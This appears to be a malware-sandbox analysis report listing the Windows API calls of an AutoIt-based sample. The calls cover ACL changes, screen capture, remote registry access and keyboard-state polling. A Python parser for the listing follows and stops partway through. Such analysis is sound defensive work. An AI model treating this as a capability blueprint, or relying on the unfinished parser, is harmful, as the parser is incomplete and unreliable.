                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0086F1C8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                            • String ID: 0
                                            • API String ID: 1296962147-4108050209
                                            • Opcode ID: b0040f56175dbb95a76164e699eeb2a0fa543d362b51c52ef74296435be06321
                                            • Instruction ID: db3e606626f83f4487335baa6da220db95f180368cf138c00226a70a4aab978c
                                            • Opcode Fuzzy Hash: b0040f56175dbb95a76164e699eeb2a0fa543d362b51c52ef74296435be06321
                                            • Instruction Fuzzy Hash: 4A818A71104305AFDB21CF18D884E6BBBE9FB89354F11492EFA94D7292DB30D905CBA2
                                            APIs
                                              • Part of subcall function 0083ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0083ABD7
                                              • Part of subcall function 0083ABBB: GetLastError.KERNEL32(?,0083A69F,?,?,?), ref: 0083ABE1
                                              • Part of subcall function 0083ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0083A69F,?,?,?), ref: 0083ABF0
                                              • Part of subcall function 0083ABBB: HeapAlloc.KERNEL32(00000000,?,0083A69F,?,?,?), ref: 0083ABF7
                                              • Part of subcall function 0083ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0083AC0E
                                              • Part of subcall function 0083AC56: GetProcessHeap.KERNEL32(00000008,0083A6B5,00000000,00000000,?,0083A6B5,?), ref: 0083AC62
                                              • Part of subcall function 0083AC56: HeapAlloc.KERNEL32(00000000,?,0083A6B5,?), ref: 0083AC69
                                              • Part of subcall function 0083AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0083A6B5,?), ref: 0083AC7A
                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0083A8CB
                                            • _memset.LIBCMT ref: 0083A8E0
                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0083A8FF
                                            • GetLengthSid.ADVAPI32(?), ref: 0083A910
                                            • GetAce.ADVAPI32(?,00000000,?), ref: 0083A94D
                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0083A969
                                            • GetLengthSid.ADVAPI32(?), ref: 0083A986
                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0083A995
                                            • HeapAlloc.KERNEL32(00000000), ref: 0083A99C
                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0083A9BD
                                            • CopySid.ADVAPI32(00000000), ref: 0083A9C4
                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0083A9F5
                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0083AA1B
                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0083AA2F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                            • String ID:
                                            • API String ID: 3996160137-0
                                            • Opcode ID: 40675b2a0ee8d1fd6a9eb8d8ddd4855ee8fde6d801c0c88ef335633e881428fc
                                            • Instruction ID: 0d6f4ef2341e8bc7cc14a78fa68b0130cedbc81f448c7c21f9c56c1e881fb37c
                                            • Opcode Fuzzy Hash: 40675b2a0ee8d1fd6a9eb8d8ddd4855ee8fde6d801c0c88ef335633e881428fc
                                            • Instruction Fuzzy Hash: 2C515A75900219AFDF14DF94DC84EEEBBB9FF44310F048119E855EA290DB359A05CBA1
                                            APIs
                                            • GetDC.USER32(00000000), ref: 00859E36
                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00859E42
                                            • CreateCompatibleDC.GDI32(?), ref: 00859E4E
                                            • SelectObject.GDI32(00000000,?), ref: 00859E5B
                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00859EAF
                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00859EEB
                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00859F0F
                                            • SelectObject.GDI32(00000006,?), ref: 00859F17
                                            • DeleteObject.GDI32(?), ref: 00859F20
                                            • DeleteDC.GDI32(00000006), ref: 00859F27
                                            • ReleaseDC.USER32(00000000,?), ref: 00859F32
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                            • String ID: (
                                            • API String ID: 2598888154-3887548279
                                            • Opcode ID: db1f54312c93caa02cbf21f974756726a5628bfe43ded2b426a6bb6c0c05dd43
                                            • Instruction ID: 9381692d58d09804af7c80838a14a408ea0cfed2b5fae9e5c566e18153e2470b
                                            • Opcode Fuzzy Hash: db1f54312c93caa02cbf21f974756726a5628bfe43ded2b426a6bb6c0c05dd43
                                            • Instruction Fuzzy Hash: 8C513775900309EFCB14CFA8C889EAEBBB9FF48711F14841DF99AA7250D771A9458B90
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: LoadString__swprintf_wprintf
                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                            • API String ID: 2889450990-2391861430
                                            • Opcode ID: 5c3c66faf1b81ec8b83ea023e4a23e400d7eab278a05d6e66babae46d21fdeb0
                                            • Instruction ID: 00de80ebb82cd3d70975cb9ca8925ccca60b6986917a32a6ae6d3daaaea586f4
                                            • Opcode Fuzzy Hash: 5c3c66faf1b81ec8b83ea023e4a23e400d7eab278a05d6e66babae46d21fdeb0
                                            • Instruction Fuzzy Hash: 98517B71900209AACF55EBA8DD96EEEB778FF08304F100165F505B21A2EB306F59DF62
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: LoadString__swprintf_wprintf
                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                            • API String ID: 2889450990-3420473620
                                            • Opcode ID: 2f6d778ab72041215cd89788c86c20d5533db4f079a97d246a2d4bd082ba736f
                                            • Instruction ID: ac9dc419c57cad9b61420f5a6481d27297d4e9881439c8e4c515941cda3220b9
                                            • Opcode Fuzzy Hash: 2f6d778ab72041215cd89788c86c20d5533db4f079a97d246a2d4bd082ba736f
                                            • Instruction Fuzzy Hash: 62519B71900219AACF54EBE8DD86EEEB778FF04344F100165B505B21A2EB346F59DFA2
                                            APIs
                                            • _memset.LIBCMT ref: 008455D7
                                            • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00845664
                                            • GetMenuItemCount.USER32(008C1708), ref: 008456ED
                                            • DeleteMenu.USER32(008C1708,00000005,00000000,000000F5,?,?), ref: 0084577D
                                            • DeleteMenu.USER32(008C1708,00000004,00000000), ref: 00845785
                                            • DeleteMenu.USER32(008C1708,00000006,00000000), ref: 0084578D
                                            • DeleteMenu.USER32(008C1708,00000003,00000000), ref: 00845795
                                            • GetMenuItemCount.USER32(008C1708), ref: 0084579D
                                            • SetMenuItemInfoW.USER32(008C1708,00000004,00000000,00000030), ref: 008457D3
                                            • GetCursorPos.USER32(?), ref: 008457DD
                                            • SetForegroundWindow.USER32(00000000), ref: 008457E6
                                            • TrackPopupMenuEx.USER32(008C1708,00000000,?,00000000,00000000,00000000), ref: 008457F9
                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00845805
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                            • String ID:
                                            • API String ID: 3993528054-0
                                            • Opcode ID: 21095f1cf4b57b6396629c3ecdce7cc1c464f9e7aa8d03e9b25560287ee171b4
                                            • Instruction ID: fb7985ccf9e9fb7fde824c212c45e88b57aa48406be85b1c0be4e293a2cc5206
                                            • Opcode Fuzzy Hash: 21095f1cf4b57b6396629c3ecdce7cc1c464f9e7aa8d03e9b25560287ee171b4
                                            • Instruction Fuzzy Hash: 3871F170641A1DBFEB209B18CC49FAEBF65FB10368F240216F619EA1D2C7716C10DB91
                                            APIs
                                            • _memset.LIBCMT ref: 0083A1DC
                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0083A211
                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0083A22D
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0083A249
                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0083A273
                                            • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0083A29B
                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0083A2A6
                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0083A2AB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                            • API String ID: 1687751970-22481851
                                            • Opcode ID: 80d2095ca4afba0422ebeb1f6de10ab9080909558ac5d6766fbbf904af301c0e
                                            • Instruction ID: 714a3a9dfc01205dcc1dc093b4295bbaa2770560b154c1eea8227679e3c7c50e
                                            • Opcode Fuzzy Hash: 80d2095ca4afba0422ebeb1f6de10ab9080909558ac5d6766fbbf904af301c0e
                                            • Instruction Fuzzy Hash: C141E975C10229AADB25EBA8DC95DEEB778FF04310F004129F811E32A1EB709D15CBA1
                                            APIs
                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00862BB5,?,?), ref: 00863C1D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: BuffCharUpper
                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                            • API String ID: 3964851224-909552448
                                            • Opcode ID: 74a9c0a2b6f86df265f2b44c1d75fd1bbc17598778bafe3ffcbf740433719b5e
                                            • Instruction ID: f00b7216507984483ff0ccf059b8cfe2985bb9ff0dd67a985e63d7bf469342eb
                                            • Opcode Fuzzy Hash: 74a9c0a2b6f86df265f2b44c1d75fd1bbc17598778bafe3ffcbf740433719b5e
                                            • Instruction Fuzzy Hash: 68414D3011024B8BDF10EF58DC52AEA3365FF22350F115814FD69EB292EB70AE9ACB51
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,008736F4,00000010,?,Bad directive syntax error,0089DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 008425D6
                                            • LoadStringW.USER32(00000000,?,008736F4,00000010), ref: 008425DD
                                            • _wprintf.LIBCMT ref: 00842610
                                            • __swprintf.LIBCMT ref: 00842632
                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 008426A1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                            • API String ID: 1080873982-4153970271
                                            • Opcode ID: 28ef56202a16895300b125fb444b8dfa8fb65c292966131ad3e9f42a9c50c6f9
                                            • Instruction ID: 7360e2c1c6ce428993daf47e57715c6a1bf7248ae1b61d2f72c39f44878dd5d0
                                            • Opcode Fuzzy Hash: 28ef56202a16895300b125fb444b8dfa8fb65c292966131ad3e9f42a9c50c6f9
                                            • Instruction Fuzzy Hash: C6214D3180021EBFCF11AF94DC4AEEE7B79FF18304F040455F515A62A2EA75AA58DB61
                                            APIs
                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00847B42
                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00847B58
                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00847B69
                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00847B7B
                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00847B8C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: SendString
                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                            • API String ID: 890592661-1007645807
                                            • Opcode ID: a927656612467ec77ae160d296e999bbf627a751cb721f4bf695545319e241ea
                                            • Instruction ID: b6ecbe1343451835ff40e1580c428d7ea16d16b62f0f5e32825b0374e04d9ad5
                                            • Opcode Fuzzy Hash: a927656612467ec77ae160d296e999bbf627a751cb721f4bf695545319e241ea
                                            • Instruction Fuzzy Hash: 4C1194F165026D79E760B769CC4ADFF7A7CFF91B10F0005297421E22D1EE601A49CAB1
                                            APIs
                                            • timeGetTime.WINMM ref: 00847794
                                              • Part of subcall function 0081DC38: timeGetTime.WINMM(?,76C1B400,008758AB), ref: 0081DC3C
                                            • Sleep.KERNEL32(0000000A), ref: 008477C0
                                            • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 008477E4
                                            • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00847806
                                            • SetActiveWindow.USER32 ref: 00847825
                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00847833
                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00847852
                                            • Sleep.KERNEL32(000000FA), ref: 0084785D
                                            • IsWindow.USER32 ref: 00847869
                                            • EndDialog.USER32(00000000), ref: 0084787A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                            • String ID: BUTTON
                                            • API String ID: 1194449130-3405671355
                                            • Opcode ID: 14dcc76b9f405b0f6b52f96a93d15704c6c7d38751f6c72fe998af9c9b372483
                                            • Instruction ID: dcaf973e378a93316467daff788a92a3c0829d428be040bbd16c19974a855cd2
                                            • Opcode Fuzzy Hash: 14dcc76b9f405b0f6b52f96a93d15704c6c7d38751f6c72fe998af9c9b372483
                                            • Instruction Fuzzy Hash: 712158B020434DAFE7005BB8FC89E6A3F39FB48349B008425F506C62A2DF759C06DB65
                                            APIs
                                              • Part of subcall function 0080936C: __swprintf.LIBCMT ref: 008093AB
                                              • Part of subcall function 0080936C: __itow.LIBCMT ref: 008093DF
                                            • CoInitialize.OLE32(00000000), ref: 0085034B
                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008503DE
                                            • SHGetDesktopFolder.SHELL32(?), ref: 008503F2
                                            • CoCreateInstance.OLE32(0088DA8C,00000000,00000001,008B3CF8,?), ref: 0085043E
                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008504AD
                                            • CoTaskMemFree.OLE32(?,?), ref: 00850505
                                            • _memset.LIBCMT ref: 00850542
                                            • SHBrowseForFolderW.SHELL32(?), ref: 0085057E
                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008505A1
                                            • CoTaskMemFree.OLE32(00000000), ref: 008505A8
                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 008505DF
                                            • CoUninitialize.OLE32(00000001,00000000), ref: 008505E1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                            • String ID:
                                            • API String ID: 1246142700-0
                                            • Opcode ID: a071a40cd7bd2d643d13dba4de703c9b841b07f5b953135f02b119ac13823341
                                            • Instruction ID: 345c59c87e5fc0b5776ff5ea5ce99161a928fa08545d1e7f3f2743dfc3748227
                                            • Opcode Fuzzy Hash: a071a40cd7bd2d643d13dba4de703c9b841b07f5b953135f02b119ac13823341
                                            • Instruction Fuzzy Hash: C6B1D975A00209AFDB14DFA8C888DAEBBB9FF48305B1484A9F905EB251DB70ED45CF51
                                            APIs
                                            • GetKeyboardState.USER32(?), ref: 00842ED6
                                            • SetKeyboardState.USER32(?), ref: 00842F41
                                            • GetAsyncKeyState.USER32(000000A0), ref: 00842F61
                                            • GetKeyState.USER32(000000A0), ref: 00842F78
                                            • GetAsyncKeyState.USER32(000000A1), ref: 00842FA7
                                            • GetKeyState.USER32(000000A1), ref: 00842FB8
                                            • GetAsyncKeyState.USER32(00000011), ref: 00842FE4
                                            • GetKeyState.USER32(00000011), ref: 00842FF2
                                            • GetAsyncKeyState.USER32(00000012), ref: 0084301B
                                            • GetKeyState.USER32(00000012), ref: 00843029
                                            • GetAsyncKeyState.USER32(0000005B), ref: 00843052
                                            • GetKeyState.USER32(0000005B), ref: 00843060
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: State$Async$Keyboard
                                            • String ID:
                                            • API String ID: 541375521-0
                                            • Opcode ID: 95f3c898c65220e5d1736fa7223af740999b05fd6137daff0c081c40871f41ce
                                            • Instruction ID: 09f6649470d0a54c1bb4499956a03e59b3a15350fbb7c88eb17c2997d6969b39
                                            • Opcode Fuzzy Hash: 95f3c898c65220e5d1736fa7223af740999b05fd6137daff0c081c40871f41ce
                                            • Instruction Fuzzy Hash: 2751C860608B9C29FB35EBA488517EABFF4FF11340F88459AD5C2D61C3DA549B4CC762
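The listing records each call as `Func.MODULE(args), ref: ADDR`, where `ref` is a virtual address inside the dumped image whose base is 0x00800000 ("Offset: 00800000, based on PE: true"), so `ref - 0x800000` is the RVA to look up in a disassembler. The Python below is an added example, not Joe Sandbox tooling: it parses lines in that format (the sample lines are copied from this report), converts `ref` to an RVA, handles the `Part of subcall function` and argument-less LIBCMT forms, and decodes the virtual-key constants the keyboard-state function above passes to GetAsyncKeyState/GetKeyState (0xA0 VK_LSHIFT, 0xA1 VK_RSHIFT, 0x11 VK_CONTROL, 0x12 VK_MENU, 0x5B VK_LWIN, documented Win32 values). The regex and helper names are my own.

```python
"""Parse the per-function "APIs" lines of a Joe Sandbox code-analysis listing.

Added example, not Joe Sandbox code. The sample lines are copied from the
report above; VK_* names are the documented Win32 virtual-key codes.
"""
from __future__ import annotations

import re
from typing import NamedTuple, Optional

# Image base reported by the listing ("Offset: 00800000, based on PE: true").
IMAGE_BASE = 0x00800000

# Virtual-key codes passed to GetAsyncKeyState/GetKeyState in the listing.
VK_NAMES = {
    0x11: "VK_CONTROL",
    0x12: "VK_MENU",   # Alt
    0x5B: "VK_LWIN",
    0xA0: "VK_LSHIFT",
    0xA1: "VK_RSHIFT",
}

# "• Func.MODULE(args), ref: ADDR", optionally prefixed with
# "Part of subcall function XXXXXXXX:"; LIBCMT entries carry no "(args)".
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<func>[A-Za-z_][\w@$?]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


class ApiCall(NamedTuple):
    func: str
    module: str
    args: tuple          # raw argument tokens; '?' means unresolved
    ref: int             # virtual address of the call site in the dump
    subcall_of: Optional[int]

    @property
    def rva(self) -> int:
        return self.ref - IMAGE_BASE


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None
    args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
    sub = int(m["sub"], 16) if m["sub"] else None
    return ApiCall(m["func"], m["mod"], args, int(m["ref"], 16), sub)


def parse_listing(text: str) -> list[ApiCall]:
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c]


def arg_value(tok: str) -> Optional[int]:
    """Hex token -> 32-bit int; '?' and string literals such as 'static' -> None."""
    if re.fullmatch(r"-?[0-9A-Fa-f]{8}", tok):
        return int(tok, 16) & 0xFFFFFFFF   # "-00000001" is 0xFFFFFFFF on the stack
    return None


def describe(call: ApiCall) -> str:
    """One-line summary with the RVA; VK codes are named for key-state APIs."""
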